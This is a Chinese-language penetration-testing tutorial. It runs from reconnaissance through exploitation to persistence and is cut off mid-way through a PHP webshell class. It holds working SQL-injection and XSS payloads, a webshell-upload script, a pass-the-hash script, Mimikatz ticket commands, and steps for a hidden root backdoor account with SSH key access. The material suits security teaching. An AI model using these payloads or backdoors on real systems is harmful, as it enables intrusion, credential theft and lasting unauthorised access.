黑客渗透测试全流程深度解析：从信息收集到权限维持

渗透测试是网络安全领域至关重要的实践环节，它通过模拟恶意攻击者的技术手段，帮助组织发现系统中的安全漏洞。一个完整的渗透测试流程包含多个阶段，每个阶段都有其独特的技术要点和方法论。本文将深入探讨渗透测试的完整生命周期，分享一些实用技巧和代码示例。

信息收集：渗透测试的基石

信息收集是整个渗透测试过程中最基础也是最重要的环节。优秀的安全工程师往往在这个阶段投入大量时间，因为充分的信息收集能为后续攻击提供坚实的基础。

被动信息收集技术

被动信息收集指的是在不与目标系统直接交互的情况下获取信息的方法。这种方法隐蔽性强，不容易触发目标的防御机制。

WHOIS查询是获取目标域名注册信息的重要途径。通过WHOIS数据，我们可以获得域名注册商、注册日期、过期时间以及管理员联系方式等信息。

import whois

def whois_lookup(domain):
    try:
        domain_info = whois.whois(domain)
        print(f"域名: {domain_info.domain_name}")
        print(f"注册商: {domain_info.registrar}")
        print(f"创建日期: {domain_info.creation_date}")
        print(f"过期日期: {domain_info.expiration_date}")
        print(f"名称服务器: {domain_info.name_servers}")
    except Exception as e:
        print(f"WHOIS查询失败: {str(e)}")

# 使用示例
whois_lookup("example.com")

DNS枚举是另一个关键的被动信息收集技术。通过DNS查询，我们可以获取目标域名的各种记录类型，包括A记录、MX记录、TXT记录等。

# 使用dig命令进行DNS枚举
dig example.com ANY
dig MX example.com
dig TXT example.com

# 使用nslookup
nslookup -type=ANY example.com

主动信息收集方法

主动信息收集需要与目标系统直接交互，虽然风险较高但获得的信息也更加准确和实时。

端口扫描是主动信息收集的核心技术。Nmap是最常用的端口扫描工具，它提供了丰富的扫描选项。

# 全面扫描
nmap -sS -sV -sC -O -p- target_ip

# 快速扫描常用端口
nmap -sS --top-ports 1000 target_ip

# UDP端口扫描
nmap -sU -p 53,67,68,69,123 target_ip

对于大规模网络扫描，我们可以使用Masscan这种高速端口扫描工具：

# 扫描整个B类网络
masscan -p1-65535 10.0.0.0/16 --rate=10000

漏洞扫描与评估

在完成信息收集后，下一步是识别目标系统中存在的安全漏洞。漏洞扫描可以分为自动扫描和手动验证两个阶段。

自动化漏洞扫描

自动化漏洞扫描工具能够快速识别已知漏洞，提高测试效率。Nessus、OpenVAS等都是优秀的商业化漏洞扫描器。

# 简单的漏洞检测脚本示例
import requests
import socket

def check_common_vulns(target_url):
    vulnerabilities = []

    # 检查目录遍历漏洞
    traversal_payloads = ["../../../etc/passwd", "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts"]
    for payload in traversal_payloads:
        test_url = f"{target_url}/files/{payload}"
        response = requests.get(test_url)
        if "root:" in response.text or "[extensions]" in response.text:
            vulnerabilities.append(f"目录遍历漏洞: {test_url}")

    # 检查SQL注入漏洞
    sql_payloads = ["'", "';", "' OR '1'='1"]
    for payload in sql_payloads:
        test_url = f"{target_url}/search?q=test{payload}"
        response = requests.get(test_url)
        if "sql" in response.text.lower() or "mysql" in response.text.lower():
            vulnerabilities.append(f"可能的SQL注入: {test_url}")

    return vulnerabilities

手动漏洞验证

自动化工具会产生误报，因此手动验证至关重要。经验丰富的渗透测试人员会结合多种技术进行验证。

SQL注入漏洞验证需要仔细分析应用程序的输入处理机制：

-- 联合查询注入
' UNION SELECT username, password FROM users--

-- 基于时间的盲注
'; IF (SELECT COUNT(*) FROM users) > 0 WAITFOR DELAY '0:0:5'--

-- 报错注入
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT version()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

XSS漏洞验证需要测试各种上下文中的脚本执行：

<!-- 测试基本XSS -->
<script>alert('XSS')</script>

<!-- 测试事件处理器 -->
<img src=x onerror=alert(1)>

<!-- 测试DOM型XSS -->
"><script>alert(document.cookie)</script>

漏洞利用与权限提升

识别漏洞后，下一步就是利用这些漏洞获取系统访问权限。这个阶段需要根据目标系统的具体环境选择合适的攻击载荷。

远程代码执行漏洞利用

对于Web应用程序，文件上传漏洞和反序列化漏洞是获取初始访问权限的常见途径。

# 文件上传漏洞利用示例
import requests

def upload_webshell(target_url, upload_path):
    # 准备Webshell内容
    webshell = "<?php system($_GET['cmd']); ?>"

    files = {'file': ('shell.php', webshell, 'application/x-php')}
    data = {'submit': 'Upload'}

    response = requests.post(f"{target_url}/{upload_path}", files=files, data=data)

    if response.status_code == 200:
        print("Webshell上传成功")
        # 测试命令执行
        test_cmd = requests.get(f"{target_url}/uploads/shell.php?cmd=whoami")
        print(f"命令执行结果: {test_cmd.text}")

权限提升技术

获取初始访问权限后，通常需要将权限提升到更高级别。在Linux系统中，SUID二进制文件和内核漏洞是常见的提权途径。

# 查找具有SUID权限的可执行文件
find / -perm -4000 2>/dev/null

# 检查内核版本
uname -a
cat /etc/issue

# 检查可写的系统文件
find / -writable 2>/dev/null | grep -v proc | grep -v sys

在Windows系统中，服务配置错误和令牌窃取是常见的提权方法：

# 检查当前用户权限
whoami /priv

# 查找可写服务
sc query state=all | findstr SERVICE_NAME
Get-WmiObject -Class Win32_Service | Where-Object {$_.PathName -like "*$env:ProgramFiles*"}

# 检查AlwaysInstallElevated注册表项
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

横向移动与权限维持

在渗透测试中，获取单个系统的访问权限往往只是开始。真正的挑战在于如何在网络内部横向移动并维持持久访问。

横向移动技术

横向移动涉及在网络内部从一个系统跳转到另一个系统。密码哈希和票据是横向移动的关键。

Pass-the-Hash攻击允许攻击者使用密码哈希而非明文密码进行认证：

import subprocess

def pass_the_hash(target_ip, username, hash_value):
    # 使用pth-winexe进行哈希传递
    command = f"pth-winexe -U {username}%{hash_value} //{target_ip} cmd.exe"

    try:
        result = subprocess.run(command, shell=True, capture_output=True, text=True)
        print(f"连接结果: {result.stdout}")
    except Exception as e:
        print(f"攻击失败: {str(e)}")

Kerberos票据攻击在Active Directory环境中特别有效：

# 使用Mimikatz提取Kerberos票据
mimikatz # sekurlsa::tickets /export

# 使用票据进行横向移动
mimikatz # kerberos::ptt ticket.kirbi

权限维持技术

权限维持确保攻击者即使在系统重启或密码更改后仍能保持访问。后门和Webshell是常见的维持方法。

创建隐蔽的后门账户：

# Linux系统后门账户
useradd -g 0 -o -u 0 -s /bin/bash backdoor
echo "backdoor:password123" | chpasswd

# 添加SSH密钥认证
mkdir -p /home/backdoor/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2E..." > /home/backdoor/.ssh/authorized_keys

部署Webshell维持访问：

<?php
// 高级Webshell示例
class AdvancedWebshell {
    private $password = "s3cr3t_p@ssw0rd";
    private $connection;

    public function __construct() {
        if(isset($_POST['pass']) && $_POST['pass